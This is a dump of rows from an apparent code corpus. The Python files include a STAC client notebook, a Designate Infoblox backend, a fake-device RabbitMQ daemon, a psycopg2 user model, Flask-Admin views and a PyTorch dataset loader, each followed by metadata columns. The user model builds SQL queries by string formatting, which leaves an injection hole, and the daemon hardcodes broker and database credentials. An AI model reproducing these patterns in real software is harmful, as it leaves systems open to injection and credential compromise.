] | null | null | null | #!/usr/bin/env python
# coding: utf-8
#%%
import stac
#%%
s = stac.STAC('http://brazildatacube.dpi.inpe.br/bdc-stac/0.8.1/', True)
#%%
s.catalog
#%%
collection = s.collection('C4_64_16D_MED')
collection
#%%
items = collection.get_items(filter={'bbox':'-56.86523437500001,-15.919073517982413,-53.17382812500001,-13.902075852500483', 'time':'2016-09-13/2019-12-31'})
items
| 19.736842 | 157 | 0.698667 | 55 | 375 | 4.690909 | 0.781818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263768 | 0.08 | 375 | 18 | 158 | 20.833333 | 0.484058 | 0.117333 | 0 | 0 | 0 | 0 | 0.518519 | 0.302469 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0f3c685bf3c706b184f1be524f6612e1e97c2875 | 1,704 | py | Python | designate/backend/impl_infoblox/record_factory.py | infobloxopen/designate | 531a28b8453cfe5641284a16e0342db8d709ab36 | [
"Apache-2.0"
] | null | null | null | designate/backend/impl_infoblox/record_factory.py | infobloxopen/designate | 531a28b8453cfe5641284a16e0342db8d709ab36 | [
"Apache-2.0"
] | null | null | null | designate/backend/impl_infoblox/record_factory.py | infobloxopen/designate | 531a28b8453cfe5641284a16e0342db8d709ab36 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Infoblox
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from designate.i18n import _LI
from designate.backend.impl_infoblox.records import a
from designate.backend.impl_infoblox.records import aaaa
from designate.backend.impl_infoblox.records import cname
from designate.backend.impl_infoblox.records import ptr
from designate.backend.impl_infoblox.records import soa
from designate.backend.impl_infoblox.records import ns
LOG = logging.getLogger(__name__)
class RecordFactory(object):
@staticmethod
def get_record(recordset, infoblox, tenant_name):
if recordset.type == "A":
return a.ARecord(infoblox, tenant_name)
if recordset.type == "CNAME":
return cname.CNameRecord(infoblox, tenant_name)
if recordset.type == "NS":
return ns.NSRecord(infoblox, tenant_name)
if recordset.type == "SOA":
return soa.SOARecord(infoblox, tenant_name)
if recordset.type == "PTR":
return ptr.PTRRecord(infoblox, tenant_name)
if recordset.type == "AAAA":
return aaaa.AAAARecord(infoblox, tenant_name)
LOG.error(_LI("Unknown type %s"), recordset.type)
| 39.627907 | 75 | 0.7277 | 227 | 1,704 | 5.374449 | 0.440529 | 0.07459 | 0.103279 | 0.118033 | 0.383607 | 0.383607 | 0.221311 | 0 | 0 | 0 | 0 | 0.007252 | 0.190728 | 1,704 | 42 | 76 | 40.571429 | 0.877447 | 0.320423 | 0 | 0 | 0 | 0 | 0.028846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.32 | 0 | 0.64 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0f42949be84c6e30aca5f319502468abb01b7512 | 849 | py | Python | crescent/resources/s3/bucket/transition.py | mpolatcan/zepyhrus | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | [
"Apache-2.0"
] | 1 | 2020-03-26T19:20:03.000Z | 2020-03-26T19:20:03.000Z | crescent/resources/s3/bucket/transition.py | mpolatcan/zepyhrus | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | [
"Apache-2.0"
] | null | null | null | crescent/resources/s3/bucket/transition.py | mpolatcan/zepyhrus | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | [
"Apache-2.0"
] | null | null | null | from crescent.core import Model
from crescent.functions import AnyFn
from .constants import AllowedValues, ModelRequiredProperties
from typing import Union
class Transition(Model):
def __init__(self):
super(Transition, self).__init__(
allowed_values={self.StorageClass.__name__: AllowedValues.TRANSITION_SC},
required_properties=ModelRequiredProperties.TRANSITION
)
def StorageClass(self, storage_class: Union[str, AnyFn]):
return self._set_field(self.StorageClass.__name__, storage_class)
def TransitionDate(self, transition_date: Union[str, AnyFn]):
return self._set_field(self.TransitionDate.__name__, transition_date)
def TransitionInDays(self, transition_in_days: Union[int, AnyFn]):
return self._set_field(self.TransitionInDays.__name__, transition_in_days)
| 38.590909 | 85 | 0.759717 | 94 | 849 | 6.425532 | 0.382979 | 0.054636 | 0.074503 | 0.089404 | 0.160596 | 0.160596 | 0.115894 | 0.115894 | 0 | 0 | 0 | 0 | 0.160188 | 849 | 21 | 86 | 40.428571 | 0.847125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.1875 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
0f4db0e6bc89de8ac27da4ed1b34ec1251d19ce7 | 6,107 | py | Python | Testing/daemon_Fake_Dev.py | nandor1992/FogOfThings | c412c26bfbd31162683e57b3dc2b5a0a5f21d9b0 | [
"Apache-2.0"
] | 1 | 2020-06-23T10:41:33.000Z | 2020-06-23T10:41:33.000Z | Testing/daemon_Fake_Dev.py | nandor1992/FogOfThings | c412c26bfbd31162683e57b3dc2b5a0a5f21d9b0 | [
"Apache-2.0"
] | null | null | null | Testing/daemon_Fake_Dev.py | nandor1992/FogOfThings | c412c26bfbd31162683e57b3dc2b5a0a5f21d9b0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import couchdb
import pika
import ast
import time
import threading
import ctypes
import datetime
import sys
from daemon import Daemon
import ConfigParser
import logging
t=time
t.clock()
PIDFILE="/home/pi/FogOfThings/Device/pid/fake_dev.pid"
Config=ConfigParser.ConfigParser()
Config.read("/home/pi/FogOfThings/Device/config.ini")
LOGFILE = Config.get("Log","location")+'/fake_dev.log'
logging.basicConfig(filename=LOGFILE,level=logging.DEBUG)
logging.getLogger("pika").setLevel(logging.ERROR)
class Listener():
def __init__(self,c_user,c_pass,user,passw,port,virt,que,dev,rte,rate):
logging.debug("Initialized!")
self.c_user=c_user
self.c_pass=c_pass
self.couch=couchdb.Server('http://'+self.c_user+':'+self.c_pass+'@127.0.0.1:5984/')
self.credentials = pika.PlainCredentials(user,passw)
self.parameters = pika.ConnectionParameters('localhost',port,virt,self.credentials)
self.connection = pika.BlockingConnection(self.parameters);
self.channel = self.connection.channel()
self.channel.basic_qos(prefetch_count=1)
self.device="Python_Dev"
self.channel.basic_consume(self.on_request, queue=que,no_ack=True)
self.sum=0.0
self.rec_time=t.time()
self.t_start=datetime.datetime.now()
self.count=0
self.proc=0.0
self.first=0;
self.rate=rate
self.t_start=datetime.datetime.now()
self.C_Dev=dev
self.C_Rate=rte
def saveToCouch(self,data):
db=self.couch['monitoring']
data['type']="Driver"
data['Gateway']=Config.get("General","gateway_name")
data['Device']=self.C_Dev
data['Rate']=self.C_Rate
logging.debug(data)
db.save(data)
def on_request(self,ch, method, properties, body):
global t
global rate
data=ast.literal_eval(body)
#logging.debug("---------------Message Received-----------")
#logging.debug("Cnt:"+str(self.count))
end=t.time()
#logging.debug(data['start_time'])
#logging.debug(end)
start=float(data['start_time'])
#logging.debug("Elapsed: "+str((end-start)*1000))
#logging.debug("Processing: "+str(int(data['proc_time'])/1000.0))
if end-self.rec_time >= self.rate:
logging.debug("Started at:"+str(self.t_start))
data=self.summary()
data['date']=self.t_start.strftime("%Y-%m-%d %H:%M:%S")
logging.debug(data)
self.t_start=datetime.datetime.now()
self.sum=0.0
self.count=0
self.proc=0.0
self.rec_time=end
self.saveToCouch(data)
else:
self.sum=self.sum+(end-start)*1000
self.count=self.count+1
self.proc=self.proc+int(data['proc_time'])/1000.0
def putData(data):
db=self.couch['monitoring']
db.save(data);
def stop(self):
self.channel.stop_consuming()
self.channel.close()
self.connection.close()
logging.debug("Stopped Listening!")
def summary(self):
return {'response_time':self.sum/self.count,'proc_time':self.proc/self.count}
def run(self):
logging.debug("Started Listening!")
self.channel.start_consuming()
class Poster(threading.Thread):
global running
running = True
def __init__(self,c_user,c_pass,user,passw,port,virt,rate,dev):
logging.debug("Initialized!")
threading.Thread.__init__(self)
self.c_user=c_user
self.c_pass=c_pass
self.couch=couchdb.Server('http://'+self.c_user+':'+self.c_pass+'@127.0.0.1:5984/')
self.credentials = pika.PlainCredentials(user,passw)
self.parameters = pika.ConnectionParameters('localhost',port,virt,self.credentials)
self.connection = pika.BlockingConnection(self.parameters);
self.channel = self.connection.channel()
self.channel.basic_qos(prefetch_count=1)
self.device=dev
self.rate=10.0/rate
self.count=0
def send_request(self):
global t
message_amqp=t.time()
properties_m=pika.BasicProperties(headers={'device':self.device})
self.channel.basic_publish(exchange='device', routing_key='', body="{:10.8f}".format(message_amqp), properties=properties_m)
def stop(self):
global running
running = False
def run(self):
global running
logging.debug("Started Posting!")
# while not self.stopMe:
# self.send_request()
# time.sleep(self.rate)
while running:
self.send_request()
time.sleep(self.rate)
self.channel.close()
self.connection.close()
logging.debug("Posting Done!")
class Fake_Dev():
def init(self,dev,rate,que):
self.l=Listener("admin","hunter","admin","hunter",5672,"test",que,dev,rate,10)
self.p=Poster("admin","hunter","admin","hunter",5672,"test",rate,dev)
def run(self):
self.p.start()
self.l.run()
def stop(self):
try:
self.p.stop()
time.sleep(2)
self.l.stop()
except AttributeError:
pass
logging.debug("Interrupt Keyboard - Stop!")
if __name__ == "__main__":
up=Fake_Dev()
try:
for arg in sys.argv:
part=arg.split("=")
if part[0][2:]=="device":
dev=part[1]
elif part[0][2:]=="rate":
rate=float(part[1])
elif part[0][2:]=="que":
que=part[1]
if dev!=None and rate!=None and que!=None:
msg_rate=rate*10
else:
exit()
up.init(dev,rate,que)
up.run()
except Exception , e:
logging.debug(e)
up.stop()
logging.debug("Exiting Main Thread - Keyboard")
except KeyboardInterrupt:
up.stop()
logging.debug("Exiting Main Thread - Keyboard")
| 33.190217 | 132 | 0.594727 | 766 | 6,107 | 4.63577 | 0.24282 | 0.067587 | 0.015207 | 0.011264 | 0.384962 | 0.347789 | 0.31118 | 0.266404 | 0.202197 | 0.202197 | 0 | 0.01792 | 0.259866 | 6,107 | 183 | 133 | 33.371585 | 0.767699 | 0.05682 | 0 | 0.350318 | 0 | 0 | 0.103304 | 0.014261 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.057325 | 0.070064 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0f58ae9c56e868959385146e7aab8ad6eb80f5da | 2,344 | py | Python | models/base_model.py | siyuhuang/PoseStylizer | d1d832781ddfd3efde24bf32b36a4074fafebcc1 | [
"BSD-3-Clause"
] | 75 | 2020-07-20T01:33:15.000Z | 2022-03-26T11:55:20.000Z | models/base_model.py | siyuhuang/PoseStylizer | d1d832781ddfd3efde24bf32b36a4074fafebcc1 | [
"BSD-3-Clause"
] | 12 | 2020-07-20T12:16:11.000Z | 2022-01-13T19:31:04.000Z | models/base_model.py | siyuhuang/PoseStylizer | d1d832781ddfd3efde24bf32b36a4074fafebcc1 | [
"BSD-3-Clause"
] | 16 | 2020-07-20T01:19:16.000Z | 2022-03-26T09:34:35.000Z | import os
import torch
import torch.nn as nn
import numpy as np
import pickle
class BaseModel(nn.Module):
def __init__(self):
super(BaseModel, self).__init__()
def name(self):
return 'BaseModel'
def initialize(self, opt):
self.opt = opt
self.gpu_ids = opt.gpu_ids
self.isTrain = opt.isTrain
self.Tensor = torch.cuda.FloatTensor if self.gpu_ids else torch.Tensor
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name)
def set_input(self, input):
self.input = input
def forward(self):
pass
# used in test time, no backprop
def test(self):
pass
def get_image_paths(self):
pass
def optimize_parameters(self):
pass
def get_current_visuals(self):
return self.input
def get_current_errors(self):
return {}
def save(self, label):
pass
# helper saving function that can be used by subclasses
def save_network(self, network, network_label, epoch_label, gpu_ids, epoch, total_steps):
save_filename = '%s_%s.pth' % (epoch_label, network_label)
save_infoname = '%s.pkl' % (epoch_label)
save_path = os.path.join(self.save_dir, save_filename)
save_infoname = os.path.join(self.save_dir, save_infoname)
torch.save(network.cpu().state_dict(), save_path)
network.cuda()
info = {'epoch':epoch, 'total_steps':total_steps}
filehandler = open(save_infoname, "wb")
pickle.dump(info, filehandler)
filehandler.close()
# helper loading function that can be used by subclasses
def load_network(self, network, network_label, epoch_label):
save_filename = '%s_%s.pth' % (epoch_label, network_label)
save_path = os.path.join(self.save_dir, save_filename)
if os.path.exists(save_path):
network.load_state_dict(torch.load(save_path))
print("Found checkpoints. Network loaded.")
else:
print("Not found checkpoints. Network from scratch.")
# update learning rate (called once every epoch)
def update_learning_rate(self):
for scheduler in self.schedulers:
scheduler.step()
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate = %.7f' % lr)
| 30.441558 | 93 | 0.636092 | 305 | 2,344 | 4.691803 | 0.334426 | 0.020964 | 0.030748 | 0.02935 | 0.241789 | 0.241789 | 0.241789 | 0.168414 | 0.118099 | 0.118099 | 0 | 0.001738 | 0.263652 | 2,344 | 76 | 94 | 30.842105 | 0.827346 | 0.079352 | 0 | 0.160714 | 0 | 0 | 0.070135 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.089286 | 0.089286 | 0.053571 | 0.410714 | 0.053571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0f686508655f6cb5a008cef527be098e9ada85a3 | 1,399 | py | Python | app/api/v2/models/user_model.py | MbuguaCaleb/Questioner-V2-API | 9e3a5593250a12b74ad5dcbe220827040fa3d676 | [
"MIT"
] | null | null | null | app/api/v2/models/user_model.py | MbuguaCaleb/Questioner-V2-API | 9e3a5593250a12b74ad5dcbe220827040fa3d676 | [
"MIT"
] | 1 | 2019-01-19T13:10:02.000Z | 2019-01-19T13:10:02.000Z | app/api/v2/models/user_model.py | MbuguaCaleb/Questioner-V2-API | 9e3a5593250a12b74ad5dcbe220827040fa3d676 | [
"MIT"
] | null | null | null | from ....db_conn import initialize_db
from psycopg2.extras import RealDictCursor
from werkzeug.security import generate_password_hash,check_password_hash
con = initialize_db()
cur = con.cursor(cursor_factory=RealDictCursor)
class User(object):
table = 'users'
""" Model class for the user object """
table ='users'
def save(self, data=None):
query = """
INSERT INTO users (firstname, lastname, email, phone_number, username, password) VALUES (%(firstname)s, %(lastname)s, %(email)s, %(phone_number)s, %(username)s, %(password)s);"""
cur.execute(query, data)
con.commit()
return data
def exists(self, key, value):
""" Function to check if user exists """
query = "SELECT * FROM {} WHERE {} = '{}'".format(
self.table, key, value)
cur.execute(query)
result = cur.fetchall()
return len(result) > 0
def find(self, key, value):
"""it checks whether the user exists from the DB"""
query = "SELECT * FROM {} WHERE {} = '{}'".format(
self.table, key, value)
cur.execute(query)
result = cur.fetchone()
return result
@staticmethod
def checkpassword(hashed_password, password):
""" Function to check if passwords match """
return check_password_hash(hashed_password, password)
| 25.436364 | 186 | 0.609721 | 161 | 1,399 | 5.21118 | 0.42236 | 0.038141 | 0.053635 | 0.047676 | 0.159714 | 0.159714 | 0.159714 | 0.159714 | 0.159714 | 0.159714 | 0 | 0.001949 | 0.266619 | 1,399 | 54 | 187 | 25.907407 | 0.815789 | 0.083631 | 0 | 0.275862 | 1 | 0.034483 | 0.210784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0.137931 | 0.103448 | 0 | 0.482759 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0f73367ba6109ee049aa54a44a28f5bd872d3d4e | 5,149 | py | Python | views.py | zhoubogao/hhlyDevops | 832684bb7fa4e67a23b2e6171ed0433fe0748de5 | [
"Unlicense"
] | null | null | null | views.py | zhoubogao/hhlyDevops | 832684bb7fa4e67a23b2e6171ed0433fe0748de5 | [
"Unlicense"
] | null | null | null | views.py | zhoubogao/hhlyDevops | 832684bb7fa4e67a23b2e6171ed0433fe0748de5 | [
"Unlicense"
] | null | null | null | #-*-coding:utf-8-*-
from flask import url_for, redirect, request, current_app
from flask_admin.contrib.sqla import ModelView
from flask_admin import AdminIndexView, helpers, expose
from werkzeug.security import generate_password_hash
from flask_login import current_user, login_user, logout_user
from models import User, Role, Device, Platforms_info, Ip, Project, Domain, Port, App
from forms import LoginForm
from flask_principal import (
ActionNeed,
AnonymousIdentity,
Identity,
identity_changed,
identity_loaded,
Permission,
Principal,
RoleNeed,
Denial
)
# Initialize flask-principal
prcp = Principal()
anon_permission = Permission()
admin_permission = Permission(RoleNeed('Admin'))
admin_or_editor = Permission(RoleNeed('Admin'), RoleNeed('Devlop'))
devlop_permission = Permission(RoleNeed('Devlop'))
admin_denied = Denial(RoleNeed('Admin'))
# Create customized model view class
class UserModelView(ModelView):
can_export = True
can_view_details = True
column_exclude_list = ['password', ]
column_searchable_list = ( 'real_name', 'login', Role.name)
column_display_all_relations = True
def is_accessible(self):
return current_user.is_authenticated
def on_model_change(self, form, User, is_created):
User.password = generate_password_hash(form.password.data)
# Create customized model view class
class RoleModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('description',)
column_searchable_list = ( 'name', User.login)
column_display_all_relations = True
# Create customized model view class
class Platforms_infoModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('platform', 'description','url',
'username', 'password', 'ps',
)
column_searchable_list = ('platform', 'description','url',
'username', 'password', 'ps',
)
column_display_all_relations = True
# Create customized model view class
class DeviceModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('device_num', 'device_name', 'idc', 'location',
'used_to','hardware_type', 'brand', 'buy_date',
'brand','fast_repair_code', 'cpu', 'memory',
'disk',
)
column_searchable_list = ('device_num', 'device_name', 'idc', 'location',
'used_to','hardware_type', 'brand', 'buy_date',
'brand','fast_repair_code', 'cpu', 'memory',
'disk', Ip.ip
)
column_display_all_relations = True
# Create customized model view class
class IpModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('isp','ip', 'use', 'mask', 'mac',
'route', 'switch_port',
'username', 'password',
)
column_searchable_list = ('isp','ip', 'use', 'mask', 'mac',
'route', 'switch_port',
'username', 'password',
)
column_display_all_relations = True
# Create customized model view class
class ProjectModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('project', )
column_searchable_list = ( 'project', App.app)
column_display_all_relations = True
# Create customized model view class
class DomainModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('domain',)
column_searchable_list = ( 'domain', App.app)
column_display_all_relations = True
# Create customized model view class
class PortModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('port',)
column_searchable_list = ( 'port', App.app)
column_display_all_relations = True
# Create customized model view class
class AppModelView(ModelView):
can_export = True
can_view_details = True
column_editable_list = ('description', 'ps',)
column_searchable_list = ( 'app', Domain.domain, Port.port)
column_display_all_relations = True
# Create customized index view class that handles login & registration
class OpsAdminIndexView(AdminIndexView):
@expose('/')
# @anon_permission.require(http_exception=403)
# @admin_denied.require(http_exception=403)
def index_view(self):
if not current_user.is_authenticated:
return redirect(url_for('auth.login'))
# with admin_permission.require(http_exception=403):
return super(OpsAdminIndexView, self).index_view()
| 33.435065 | 85 | 0.619344 | 524 | 5,149 | 5.805344 | 0.253817 | 0.052597 | 0.06213 | 0.073965 | 0.522025 | 0.490796 | 0.467784 | 0.452991 | 0.423406 | 0.408284 | 0 | 0.002728 | 0.288017 | 5,149 | 153 | 86 | 33.653595 | 0.827059 | 0.112643 | 0 | 0.349057 | 0 | 0 | 0.109159 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028302 | false | 0.066038 | 0.075472 | 0.009434 | 0.650943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
0f8689ae827d935b48b38f4d0615ffaedb18fca7 | 49,355 | py | Python | dataset.py | DerryHub/the-TaobaoLive-Commodity-Identify-Competition | 7e5e5c4fbddd9949fe01810d58bd7994889c007c | [
"MIT"
] | 4 | 2020-08-15T14:49:37.000Z | 2022-01-16T08:34:07.000Z | dataset.py | weilin-droid/the-TaobaoLive-Commodity-Identify-Competition | 7e5e5c4fbddd9949fe01810d58bd7994889c007c | [
"MIT"
] | null | null | null | dataset.py | weilin-droid/the-TaobaoLive-Commodity-Identify-Competition | 7e5e5c4fbddd9949fe01810d58bd7994889c007c | [
"MIT"
] | 2 | 2021-05-26T05:16:09.000Z | 2021-06-09T09:07:49.000Z | import os
import torch
import numpy as np
from tqdm import tqdm
import json
from torch.utils.data import Dataset, DataLoader
from arcface.resnet import ResNet
from arcface.googlenet import GoogLeNet
from arcface.inception_v4 import InceptionV4
from arcface.inceptionresnet_v2 import InceptionResNetV2
from arcface.densenet import DenseNet
from arcface.resnet_cbam import ResNetCBAM
import torchvision.transforms as transforms
import cv2
import random
import jieba
from autoaugment import rand_augment_transform
from PIL import Image
'''
for image-text match
'''
class ITMatchTrain(Dataset):
def __init__(self, opt):
arcfaceDataset = ArcfaceDataset(root_dir=opt.data_path, mode="train", size=(opt.size, opt.size), imgORvdo='video')
batch_size = 256
training_params = {"batch_size": batch_size,
"shuffle": False,
"drop_last": False,
"num_workers": opt.workers}
arcfaceLoader = DataLoader(arcfaceDataset, **training_params)
self.vocab_size = arcfaceDataset.vocab_size
if opt.network == 'resnet':
model = ResNet(opt)
b_name = opt.network+'_'+opt.mode+'_{}'.format(opt.num_layers_r)
elif opt.network == 'googlenet':
model = GoogLeNet(opt)
b_name = opt.network
elif opt.network == 'inceptionv4':
model = InceptionV4(opt)
b_name = opt.network
elif opt.network == 'inceptionresnetv2':
model = InceptionResNetV2(opt)
b_name = opt.network
elif opt.network == 'densenet':
model = DenseNet(opt)
b_name = opt.network+'_{}'.format(opt.num_layers_d)
elif opt.network == 'resnet_cbam':
model = ResNetCBAM(opt)
b_name = opt.network+'_{}'.format(opt.num_layers_c)
else:
raise RuntimeError('Cannot Find the Model: {}'.format(opt.network))
model.load_state_dict(torch.load(os.path.join(opt.saved_path, b_name+'.pth')))
model.cuda()
model.eval()
self.model_name = b_name
self.features = torch.zeros((len(arcfaceDataset), opt.embedding_size))
self.texts = torch.zeros((len(arcfaceDataset), 64)).long()
self.instances = torch.zeros((len(arcfaceDataset))).long()
print('Calculating features...')
for i, d in enumerate(tqdm(arcfaceLoader)):
# img = d['img'].cuda()
text = d['text']
instance = d['instance']
# with torch.no_grad():
# feature = model(img).cpu()
# self.features[i*batch_size:(i+1)*batch_size] = feature
self.texts[i*batch_size:(i+1)*batch_size] = text
self.instances[i*batch_size:(i+1)*batch_size] = instance
def __len__(self):
return self.texts.size(0)
def __getitem__(self, index):
text = self.texts[index]
# feature = self.features[index]
feature = None
instance = self.instances[index]
# return {'feature': feature, 'text':text, 'instance':instance}
return {'text':text, 'instance':instance}
class ITMatchValidation(Dataset):
def __init__(self, size=(224, 224), root_dir='data/validation_instance/', maxLen=64, PAD=0, imgORvdo='video'):
self.root_dir = root_dir
self.size = size
text2num = Text2Num(maxLen=maxLen, root_dir='data', PAD=PAD)
self.vocab_size = text2num.vocab_size
assert imgORvdo in ['image', 'video']
tat = 'validation_'+imgORvdo+'s'
# tat = 'train_'+imgORvdo+'s'
with open(os.path.join('data', tat+'_text.json'), 'r') as f:
textDic = json.load(f)
for k in textDic.keys():
textDic[k] = text2num(textDic[k])
instances = os.listdir(root_dir)
self.items = []
print('Loading Data...')
for instance in tqdm(instances):
imgs = os.listdir(root_dir+instance)
l = []
for img in imgs:
if imgORvdo in img:
l.append(os.path.join(instance, img))
text_name = img.split(instance)[-1].split('_')[0]
l.append(textDic[text_name])
break
if len(l) < 2:
continue
self.items.append(l)
print('Done')
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.items)
def __getitem__(self, index):
imgPath, text = self.items[index]
text = torch.Tensor(text).long()
# img = np.load(os.path.join(self.root_dir, imgPath))
img = cv2.imread(os.path.join(self.root_dir, imgPath))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.astype(np.float32) / 255
hi, wi, ci = img.shape
rh = (hi-self.size[0])//2
rw = (wi-self.size[1])//2
img = img[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
img = torch.from_numpy(img)
img = img.permute(2, 0, 1)
img = self.transform(img)
return {
'img': img,
'text': text
}
'''
for text
'''
class Text2Num:
def __init__(self, maxLen, root_dir='data', PAD=0):
with open(os.path.join(root_dir, 'vocab.json'), 'r') as f:
self.vocab = json.load(f)
self.PAD = PAD
self.maxLen = maxLen
self.vocab_size = len(self.vocab)
def __call__(self, text):
words = jieba.cut(text, cut_all=False, HMM=True)
# l = [len(self.vocab)]# CLS
l = []
for w in words:
if w.strip() in self.vocab:
l.append(self.vocab[w.strip()])
if len(l) > self.maxLen:
l = l[:self.maxLen]
elif len(l) < self.maxLen:
l += [self.PAD]*(self.maxLen-len(l))
assert len(l) == self.maxLen
return l
'''
for efficientdet
'''
class EfficientdetDataset(Dataset):
def __init__(self, root_dir='data', mode='train', imgORvdo='all', transform=None, maxLen=64, PAD=0):
assert mode in ['train', 'validation']
assert imgORvdo in ['image', 'video', 'all']
self.root_dir = root_dir
self.transform = transform
text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
self.vocab_size = text2num.vocab_size
label_file = 'label.json'
with open(os.path.join(root_dir, label_file), 'r') as f:
self.labelDic = json.load(f)
self.num_classes = len(self.labelDic['label2index'])
if imgORvdo == 'image':
tats = [mode + '_images']
elif imgORvdo == 'video':
tats = [mode + '_videos']
else:
tats = [mode + '_images', mode + '_videos']
self.textDic = {}
ds = []
for t in tats:
with open(os.path.join(root_dir, t+'_annotation.json'), 'r') as f:
ds.append(json.load(f))
with open(os.path.join(root_dir, t+'_text.json'), 'r') as f:
self.textDic[t] = json.load(f)
for k in self.textDic.keys():
for kk in self.textDic[k].keys():
self.textDic[k][kk] = text2num(self.textDic[k][kk])
ls = [d['annotations'] for d in ds]
self.images = []
print('Loading {} {} data...'.format(mode, imgORvdo))
for i, l in enumerate(ls):
for d in l:
if len(d['annotations']) == 0:
continue
t = []
t.append(os.path.join(tats[i], d['img_name']))
t.append(d['annotations'])
t.append(d['img_name'])
t.append(tats[i])
self.images.append(t)
# print(len(self.images))
# self.images = self.images[:1000]
print('Done')
def __len__(self):
return len(self.images)
def __getitem__(self, index):
imgPath, annotationsList, imgName, t = self.images[index]
text_name = imgName.split('_')[0]
text = self.textDic[t][text_name]
text = torch.Tensor(text).long()
img = cv2.imread(os.path.join(self.root_dir, imgPath))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.astype(np.float32) / 255
annotations = np.zeros((len(annotationsList), 6))
for i, annotationDic in enumerate(annotationsList):
annotation = np.zeros((1, 6))
annotation[0, :4] = annotationDic['box']
annotation[0, 4] = annotationDic['label']
if annotationDic['instance_id'] > 0:
annotation[0, 5] = 1
else:
annotation[0, 5] = 0
annotations[i:i+1, :] = annotation
# annotations = np.append(annotations, annotation, axis=0)
sample = {'img': img, 'annot': annotations, 'text': text}
if self.transform:
sample = self.transform(sample)
return sample
def label2index(self, label):
return self.labelDic['label2index'][label]
def index2label(self, index):
return self.labelDic['index2label'][str(index)]
def getImagePath(self, index):
imgPath, annotationsList, imgName, t = self.images[index]
return imgPath
def getImageInfo(self, index):
imgPath, annotationsList, imgName, t = self.images[index]
imgID, frame = imgName[:-4].split('_')
return imgPath, imgID, frame
class EfficientdetDatasetVideo(Dataset):
def __init__(self, root_dir='data', mode='train', imgORvdo='video', transform=None, maxLen=64, PAD=0):
assert mode in ['train', 'validation']
assert imgORvdo in ['video']
self.root_dir = root_dir
self.transform = transform
